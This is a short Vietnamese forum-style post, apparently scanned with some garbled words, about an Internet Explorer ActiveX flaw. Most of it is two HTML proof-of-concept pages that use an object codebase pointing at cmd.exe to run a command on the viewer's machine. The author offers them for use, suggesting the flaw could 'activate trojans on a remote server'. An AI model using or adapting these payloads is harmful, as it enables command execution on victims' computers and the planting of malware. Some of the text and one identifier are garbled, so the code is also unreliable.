Một lỗi của IE liên quan đến ActiveX
Trang 1Một lỗi của TE liên quan đến ActiveX :
trang này đã được đọc Lồ lan
Các bạn save và chạy đoạn html sau:
<html>
<body>
<span id="oSpan"> </span>
<script language="javascript" >
oSpan.innerHTML="<object classid=\"clsid:11111111-1111-1111-1111-111111111111\"
codebase=\"c:/winnt/system32/cmd.exe?/c+dir \"></object>";
</script>
</body>
</html>
hoặc
<html>
<body>
<span datasrc="#o0Exec" datafld="exploit" dataformatas="html"> </span>
<xml id="oExec">
<security>
<exploit>
<![CDATA
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/cmd.exe?/c+dir" ></object>
]]>
</exploit>
</security>
</xml>
</body>
</html>
Tuy nó có hạn chế là ko chạy được thêm các parameters truyền vào, nhưng các bạn thử xem có
thể lợi dụng lỗi này để làm được nhiều việc rất có ích, như kích hoạt trojan ở remote server chẳng hạn
Thử demo ở đây hoặc đầy